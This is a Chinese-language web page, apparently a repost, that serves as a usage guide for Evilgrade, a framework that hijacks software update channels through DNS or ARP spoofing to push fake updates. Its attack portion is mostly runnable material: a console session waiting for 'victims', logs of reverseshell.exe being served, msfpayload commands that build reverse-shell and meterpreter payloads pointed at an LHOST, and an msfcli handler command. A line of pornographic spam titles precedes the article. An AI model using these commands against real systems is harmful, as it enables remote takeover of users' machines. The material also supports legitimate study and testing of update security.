日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何使用Evilgrade測試應(yīng)用程序的升級機制是否安全

關(guān)于Evilgrade

Evilgrade是一款功能強大的模塊化框架,該框架允許廣大研究人員通過向目標(biāo)應(yīng)用程序注入偽造的更新代碼,并利用存在安全問題的更新實現(xiàn)機制來測試目標(biāo)升級更新功能的安全性。該工具提供了預(yù)構(gòu)建的代理以及支持快速測試的默認工作配置。除此之外,該工具還擁有自己的WebServer和DNSServer模塊。

工具使用場景

內(nèi)部場景

1、內(nèi)部DNS訪問;

2、ARP欺騙;

3、DNS緩存投毒;

4、DHCP欺騙;

5、TCP劫持;

6、Wi-Fi訪問點偽造;

外部場景

1、內(nèi)部DNS訪問;

2、DNS緩存投毒;

實現(xiàn)的模塊

  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • ...

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

git clone https://github.com/infobyte/evilgrade.git

工具使用

下面給出的是工具的幫助信息:

evilgrade>help

Type 'help command' for more detailed help on a command.

  Commands:

    configure -  配置模塊名稱

    exit      -  退出程序

    help      -  輸出工具幫助信息

    reload    -  重新加載并更新所有模塊

    restart   -   重啟Web服務(wù)器

    set       -  配置變量

    show      - 顯示對象信息

    start     -  開啟Web服務(wù)器

    status    -  獲取Web服務(wù)器窗臺

    stop      -  停止Web服務(wù)器

    version   -  顯示框架版本

 

  Object:

     options  -  顯示當(dāng)前模塊的選項

     vhosts   -  顯示當(dāng)前模塊的VirtualHosts

     modules  -  列舉所有可用的模塊

     active   -  顯示活動模塊

列舉實現(xiàn)的模塊:

evilgrade>show modules

 

List of modules:

===============

 

...

...

...

 

- 63 modules available.

配置指定模塊:

evilgrade>conf sunjava

evilgrade(sunjava)>

開啟服務(wù)(DNS服務(wù)器和WebServer):

evilgrade>start

evilgrade>

[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...

evilgrade>

[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

 

#### Waiting for victims

 

evilgrade>

[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"

evilgrade>

[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"

evilgrade>

[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"

evilgrade>

[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

顯示狀態(tài)和日志:

evilgrade>show status

Webserver (pid 4134) already running

 

Users status:

============

 

.---------------------------------------------------------------------------------------------------------------.

| Client         | Module           | Status | Md5,Cmd,File                                                     |

+----------------+------------------+--------+------------------------------------------------------------------+

| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |

'----------------+------------------+--------+------------------------------------------------------------------'

工具高級使用

使用場景一

evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'

在這種情況下,對于每個所需的更新二進制文件,我們都可以使用 "windows/shell_reverse_tcp"這個Payload來生成偽造的更新代碼,同時使用一個反向Shell連接到192.168.233.2:4141。<%OUT%><%OUT>標(biāo)簽專門來檢測輸出二進制文件的生成位置。

比如說,如果我們運行下列命令:

evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'

那么每當(dāng)我們收到一個二進制請求時,Evilgrade將編譯該行并執(zhí)行最終字符串"./generatebin -o /tmp/update(random).exe",然后生成不同的代理。

使用場景二

在Evilgrade外運行:

[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe

在Evilgrade內(nèi)運行:

evilgrade(sunjava)>set agent /tmp/reverse-shell.exe

生成好Payload之后,我們將得到多個處理器Handler來監(jiān)聽之前分配的LHOST:

[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E

[*] Started reverse handler on 192.168.100.2:4444

[*] Starting the payload handler...

項目地址

Evilgrade:【GitHub傳送門】

參考資料

http://www.faradaysec.com/


當(dāng)前標(biāo)題:如何使用Evilgrade測試應(yīng)用程序的升級機制是否安全
URL分享:http://m.5511xx.com/article/djhcpph.html